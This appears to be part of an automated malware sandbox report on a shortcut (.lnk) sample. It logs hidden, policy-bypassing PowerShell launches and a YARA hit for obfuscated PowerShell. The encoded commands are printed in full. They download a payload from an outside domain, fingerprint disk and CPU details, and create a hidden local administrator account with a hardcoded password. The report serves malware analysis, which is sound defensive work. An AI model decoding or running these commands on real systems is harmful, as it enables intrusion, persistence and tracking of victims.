abwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvah
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8ayqa5admamqa1adiaoabjadiangbladeaywa3adgazqa4adcaygbhagyaygbiagyaygbladcaywbkadmazaayaguayga2adianqbladyaoqawadaaywazadyazga3aguanabiadyanaa3aguazabmadyaoqawadcanwawadiazaa2ageazqayagyazaayadiayqa0agmaoqbkagyaoqa1adcayqa4agiayqbhadkamwbhadmaywayageamga4agmamwayagmayqazadmamaawadyaygbhagyanqazadkanqazadeazga0adeazabhadqazqa3agyayga0adqanaa0agyayqbkadmanqa0adyaoabkagianqa2ageamgbiadganqbladuanga4adaamwawadmaywa4agqayqbiaduazga4agianaa5adiamwa0adaangbiaguamgbhadmamgaxadyayqbhadcanaa4adaayqazagqamga3adaaywbkadgaoqbhadkaoaa0adyamqawagqanwa3aguazabladuazgbkadcaywa3adyamqbmadiamgbjagqamqa3adgaywa3aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfahgavaauaeuatgbjae8azabpag4arwbdadoaogbvafqarga4ac4arwbfafqauwbuafiasqboagcakaaoagkavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataayagwacqaiackakqapackalgbdae8abgb0aguabgb0ackakqa=" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8ayqa5admamqa1adiaoabjadiangbladeaywa3adgazqa4adcaygbhagyaygbiagyaygbladcaywbkadmazaayaguayga2adianqbladyaoqawadaaywazadyazga3aguanabiadyanaa3aguazabmadyaoqawadcanwawadiazaa2ageazqayagyazaayadiayqa0agmaoqbkagyaoqa1adcayqa4agiayqbhadkamwbhadmaywayageamga4agmamwayagmayqazadmamaawadyaygbhagyanqazadkanqazadeazga0adeazabhadqazqa3agyayga0adqanaa0agyayqbkadmanqa0adyaoabkagianqa2ageamgbiadganqbladuanga4adaamwawadmaywa4agqayqbiaduazga4agianaa5adiamwa0adaangbiaguamgbhadmamgaxadyayqbhadcanaa4adaayqazagqamga3adaaywbkadgaoqbhadkaoaa0adyamqawagqanwa3aguazabladuazgbkadcaywa3adyamqbmadiamgbjagqamqa3adgaywa3aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8ayqa5admamqa1adiaoabjadiangbladeaywa3adgazqa4adcaygbhagyaygbiagyaygbladcaywbkadmazaayaguayga2adianqbladyaoqawadaaywazadyazga3aguanabiadyanaa3aguazabmadyaoqawadcanwawadiazaa2ageazqayagyazaayadiayqa0agmaoqbkagyaoqa1adcayqa4agiayqbhadkamwbhadmaywayageamga4agmamwayagmayqazadmamaawadyaygbhagyanqazadkanqazadeazga0adeazabhadqazqa3agyayga0adqanaa0agyayqbkadmanqa0adyaoabkagianqa2ageamgbiadganqbladuanga4adaamwawadmaywa4agqayqbiaduazga4agianaa5adiamwa0adaangbiaguamgbhadmamgaxadyayqbhadcanaa4adaayqazagqamga3adaaywbkadgaoqbhadkaoaa0adyamqawagqanwa3aguazabladuazgbkadcaywa3adyamqbmadiamgbjagqamqa3adgaywa3aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagadJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=

      Language, Device and Operating System Detection

      barindex
      Yara detected Obfuscated Powershell
      Source: Yara matchFile source: gW6FHWNFzR.lnk, type: SAMPLE
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
